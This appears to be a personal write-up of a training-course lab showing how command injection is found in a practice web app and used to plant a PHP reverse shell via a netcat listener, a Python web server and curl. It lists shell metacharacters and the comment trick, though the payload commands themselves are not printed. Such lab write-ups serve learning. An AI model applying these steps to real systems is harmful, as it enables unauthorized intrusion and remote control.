TCM Practical Ethical Hacking — Command Injection 0x01 Reverse Shell
This is my thought process of first identifying command injection in the first lab in the command injection series, then further using that command injection to establish a reverse shell to the target system!
§ Identifying Command Injection
To start off we are simply going to test the web application's normal functionality, we do this to simply understand how it is supposed to function before we begin testing for a command injection vulnerability.
Now, since this is a lab we are able to see the command actually used on the target system which would most likely not happen in a real application (usually).
We can see that our input which was “127.0.0.1” was inserted into a predefined command “curl -I -s -L {user input} | grep “HTTP/”. Knowing this lets us determine where we can test for command injection and where we can break the current command being used.
There are multiple shell metacharacters that can be used to perform multiple commands in one single command, this is a list of the most common ones:
- &, &&, |, ||, ;, \n, `, $()
Now, let's test one of them to run a “whoami” command on the target system:
It did not work, and here is why. After our user-supplied input, there is another command interfering with the final response of the command, namely, | grep “HTTP/”.
There is a way of preventing this part of the command from running, namely by using the hash # character. The hash character will comment out/remove everything after it has been specified from running in the final command.
Let's try including the hash character in our user-supplied input:
After adding the hash character to our input we can see that the“whoami” command successfully runs and also returns the output of the command in the response. We have now successfully identified command injection in this web application.
§ Establishing Reverse Shell
Getting command injection to work essentially means that we have Remote Code Execution (RCE) on the target system. This also means that we could establish a reverse shell for various reasons. The following are the steps I took to get a reverse shell:
• Step 1 — Reverse Shell Paylod
I usually use a site called revshells.com to get all kinds of different reverse shell payloads, the one I use here is called “PHP PentestMonkey”. You simply replace the placeholder IP address and port in the PHP script with your machine IP address and the port that you are going to use with Netcat to listen for incoming connections.
• Step 2 — Netcat Listener
We are now going to start a Netcat listener using the port we specified in the PHP reverse shell script we just modified:
• Step 3 — Python HTTP Server
We are going to abuse the fact that we already have RCE on the target system by downloading our PHP reverse shell script on the target system.
For that, we are going to start a simple Python HTTP server in the directory where we saved our PHP reverse shell script:
• Step 4 — Downloading Reverse Shell
Now that our Python HTTP server is up and running, we are going to use the curl command on the target system to download the PHP reverse shell file from our system:
We can now verify that our PHP reverse shell has been downloaded to the /tmp directory by listing the files from that directory:
• Step 5 — Establishing Reverse Shell
All there is left to do is to execute this PHP file on the target system:
It will look like nothing happened at first glance, and the web application will just load. But if we go back now into the Netcat listener we started in step 2 we can see that we have established a connection from the target system:
Hope this helped, thanks for reading!
